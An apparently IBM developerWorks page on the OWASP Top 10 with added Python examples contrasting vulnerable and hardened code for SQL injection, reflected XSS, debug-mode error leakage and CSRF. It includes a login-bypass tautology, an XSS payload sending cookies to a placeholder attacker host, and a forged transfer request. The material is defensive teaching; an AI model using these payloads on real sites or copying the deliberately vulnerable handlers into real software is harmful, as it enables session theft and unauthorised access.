OWASP Top 10 Vulnerabilities
ibm.com/developerworks/library/se-owasptop10/index.html
Free trial of AppScan Standard
IBM Security AppScan Standard helps you detect and correct many of the types of
security issues found in the OWASP top 10 list. You can download a trial version of
AppScan Standard and test it out for yourself.
As a further aid in understanding some of these vulnerabilities, the IBM Security Systems
Ethical Hacking team has prepared the following videos.
#1 Injection
Warren Moynihan defines injection and lists a few of the many examples of it. He then
provides a detailed example of how injection techniques might be used by a hacker to
gain access to otherwise protected data. Finally, he illustrates how you can use IBM
Security AppScan to find and eliminate this vulnerability.
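The injection scenario described above, worked through in code. This is an added example and not code from the article or from the IBM videos: a login query built by string concatenation is bypassed with a classic tautology payload and returns every user's protected data, while the same query written with bound parameters returns nothing for that input. The table, users and secrets are constructed for the demonstration, and passwords are kept in plaintext only to keep the example short.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the article).
USERS = [
    ("alice", "correct horse", "alice's secret"),
    ("bob", "hunter2", "bob's secret"),
]

# Classic tautology: closes the quoted string and makes the WHERE clause always true.
PAYLOAD = "' OR '1'='1"


def make_db():
    """In-memory SQLite database standing in for the application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, name, password):
    """Builds the statement by string formatting, so user input is parsed as SQL."""
    sql = "SELECT secret FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    return [row[0] for row in conn.execute(sql).fetchall()]


def login_safe(conn, name, password):
    """Parameterized statement: values travel separately from the SQL text and are
    never interpreted as part of the query, whatever characters they contain."""
    rows = conn.execute(
        "SELECT secret FROM users WHERE name = ? AND password = ?", (name, password)
    ).fetchall()
    return [row[0] for row in rows]


def demo():
    """Runs both handlers against the injection payload and a legitimate login."""
    conn = make_db()
    return {
        # WHERE name = '' OR '1'='1' AND password = '' OR '1'='1'  ->  true for every row
        "vulnerable": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        # The payload is compared literally against the name column; no user has that name
        "safe": login_safe(conn, PAYLOAD, PAYLOAD),
        "legit": login_safe(conn, "alice", "correct horse"),
    }


if __name__ == "__main__":
    for label, secrets_found in demo().items():
        print("%-10s -> %r" % (label, secrets_found))
```

The parameterized form is the fix the video recommends; escaping quotes by hand is not equivalent, because the rules differ per database and per context (numeric columns, LIKE patterns, identifiers) and one missed case is enough.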
#3 Cross-site scripting
In this video, Security Systems' Moynihan describes how hackers use cross-site scripting
(XSS) to inject script into pages that a website serves to its other users, so that the
script runs in those users' browsers. He demonstrates techniques that are used to
exploit this common vulnerability, and shows how IBM Security AppScan searches for
and identifies XSS vulnerabilities on an example website.
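A reflected XSS case in code, added here as an example and not taken from the article or the video. A search page echoes the user's query into the HTML it returns; the vulnerable version emits the attacker's `<script>` element verbatim, the hardened version entity-encodes it for the HTML text and attribute contexts. The last function shows why encoding alone is not enough in a URL context: a `javascript:` link survives entity encoding, so the scheme has to be checked separately. The payload, the `attacker.example` host and the page markup are all constructed for the demonstration.

```python
import html
from urllib.parse import urlparse

# Constructed attacker payload, delivered for example as the q= parameter of a link
# the victim is tricked into clicking; attacker.example is a placeholder host.
PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


def search_page_vulnerable(q):
    """Reflects the query into the page body without encoding: the browser parses
    the attacker's markup as part of the site's own page."""
    return "<h1>Results for %s</h1>" % q


def search_page_safe(q):
    """HTML text context: html.escape turns & < > " ' into entities, so the
    browser renders the payload as text instead of executing it."""
    return "<h1>Results for %s</h1>" % html.escape(q, quote=True)


def search_box_safe(q):
    """HTML attribute context: the same encoding, and the value must be quoted,
    otherwise a space in the input would start a new attribute."""
    return '<input name="q" value="%s">' % html.escape(q, quote=True)


def safe_link(url):
    """URL context: entity encoding does not neutralize javascript: URLs inside
    href, so allow only http/https and replace anything else with a harmless target."""
    scheme = urlparse(url).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return '<a href="%s">link</a>' % html.escape(url, quote=True)


def executes_script(page):
    """Crude check used by the demo: does the page still contain an open script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", search_page_vulnerable(PAYLOAD))
    print("safe      :", search_page_safe(PAYLOAD))
    print("attribute :", search_box_safe(PAYLOAD))
    print("link      :", safe_link("javascript:alert(document.cookie)"))
```

The point of the three contexts is that the correct encoding depends on where the data lands in the page; a single "escape everything" pass at input time does not cover them all, which is why the usual advice is to encode at output, per context.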
#5 Security misconfiguration
Misconfigured web servers provide hackers with opportunities to abuse websites. In this
video, Paul Ionesco shows how attackers take advantage of testing or debugging
features carelessly left enabled. The "least privilege" principle is recommended as a
method to mitigate the risk, and AppScan is shown finding such misconfigurations.
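One concrete form of the "debugging feature left enabled" misconfiguration, as an added example that is not from the article or the video: an error handler that, under a development setting, returns the full Python traceback to the client. The traceback reveals file paths, source lines and exception types, which is exactly the reconnaissance an attacker wants; the production setting logs the same traceback server-side under a short reference id and returns a generic page. The settings dictionaries, the item catalogue and the request handler are constructed for the demonstration.

```python
import logging
import traceback
import uuid

# Constructed settings, in the style of a web framework's config object.
DEV_SETTINGS = {"DEBUG": True}    # weak: fine on a developer's machine, dangerous in production
PROD_SETTINGS = {"DEBUG": False}  # corrected: no internals leave the server

# Constructed catalogue standing in for a database table.
ITEMS = {1: "widget", 2: "gadget"}

log = logging.getLogger("app")


def lookup_item(raw_id):
    """Raises ValueError for a non-numeric id and KeyError for an unknown one."""
    return ITEMS[int(raw_id)]


def handle_request(raw_id, settings):
    """Returns (status, body) for GET /item?id=<raw_id>.

    With DEBUG on, any exception is rendered into the response, so a single bad
    request shows the caller the server's file layout and code. With DEBUG off,
    the traceback goes to the server log keyed by a reference the user can quote
    to support, and the client sees nothing about the internals."""
    try:
        return "200 OK", "Item: " + lookup_item(raw_id)
    except Exception:
        if settings["DEBUG"]:
            return "500 Internal Server Error", traceback.format_exc()
        ref = uuid.uuid4().hex[:8]
        log.exception("request for id=%r failed, ref=%s", raw_id, ref)
        return "500 Internal Server Error", "Something went wrong (reference %s)." % ref


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    for settings in (DEV_SETTINGS, PROD_SETTINGS):
        status, body = handle_request("abc", settings)
        print("DEBUG=%s -> %s\n%s\n" % (settings["DEBUG"], status, body))
```

The fix here is deliberately a configuration switch rather than new code: the same handler is safe or unsafe purely depending on what is enabled in production, which is why this class of issue is audited by reviewing deployed settings and probing for verbose errors, not by reading application code alone.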
#8 Cross-site request forgery
Cross-site request forgery (CSRF) is currently ranked #8 on the OWASP top 10 list and
is a commonly exploited vulnerability. Cross-site request forgery is a web application
vulnerability in which an attacker's page causes the victim's browser to submit a request
to an application the victim is logged into; because the browser attaches the session
cookie automatically, the application performs the action as the user, without the user's
knowledge. Attackers commonly use CSRF
attacks to target cloud storage, social media, banking, and online shopping sites because
of the user information and actions available in those types of applications. In this video,
a member of the IBM Security Systems Ethical Hacking team explains the vulnerability,
explores the risks, tells you how to protect your web applications from the attack, and
demonstrates how AppScan Standard discovers the vulnerability.
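The CSRF attack and the standard synchronizer-token defence, worked through as an added example (not code from the article or the video). The vulnerable transfer handler accepts any request that arrives with a valid session, which is exactly what a form auto-submitted from the attacker's page produces. The hardened handler issues a random per-session token, embeds it in the legitimate form, and rejects any submission whose token does not match; the attacker cannot read the token out of the victim's page, so the forged request fails. The session layout, the transfer form and the forged request are constructed for the demonstration.

```python
import hmac
import secrets


def new_session():
    """Session created at login. The CSRF token is random per session and kept
    server-side; the same-origin policy keeps the attacker's page from reading it."""
    return {"user": "alice", "csrf_token": secrets.token_urlsafe(32)}


def render_transfer_form(session):
    """The legitimate form carries the session's token as a hidden field."""
    return (
        '<form method="POST" action="/transfer">'
        '<input type="hidden" name="csrf_token" value="%s">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
        % session["csrf_token"]
    )


def handle_transfer_vulnerable(session, form):
    """Weak handler: trusts that a request carrying the session cookie came from
    the user, so a request the attacker's page caused the browser to send succeeds."""
    return 200, "transferred %s to %s" % (form["amount"], form["to"])


def handle_transfer(session, form):
    """Hardened handler: refuse unless the submitted token equals the session's.
    compare_digest keeps the comparison constant-time so the token cannot be
    guessed character by character from response timing."""
    submitted = form.get("csrf_token", "")
    expected = session["csrf_token"]
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403, "CSRF token missing or invalid"
    return 200, "transferred %s to %s" % (form["amount"], form["to"])


# Constructed forged request: the body an attacker's hidden, auto-submitting form
# sends. The browser attaches the victim's cookie, so the session is valid, but the
# form cannot include a token the attacker never saw.
FORGED_FORM = {"to": "attacker", "amount": "1000"}


if __name__ == "__main__":
    session = new_session()
    print(render_transfer_form(session))
    print("vulnerable:", handle_transfer_vulnerable(session, FORGED_FORM))
    print("hardened  :", handle_transfer(session, FORGED_FORM))
    legit = {"to": "bob", "amount": "50", "csrf_token": session["csrf_token"]}
    print("legit     :", handle_transfer(session, legit))
```

Two details that matter in practice: the token check has to cover every state-changing request, not only the forms the developer remembered, and the token must never appear in a URL, where it leaks through Referer headers and logs. Setting the session cookie with the SameSite attribute is a useful second layer, but the token check is what the video-style defence relies on.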
Conclusion
These are only a few of the security vulnerabilities modern web applications are subject
to. However, by following the tips provided in these videos and other help available from
IBM Security Systems, and by using advanced security software such as IBM AppScan,
website administrators can find, correct, and avoid these and other web security threats.
Downloadable resources
PDF of this content
Related topic
Webinar: Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10
from Happening to You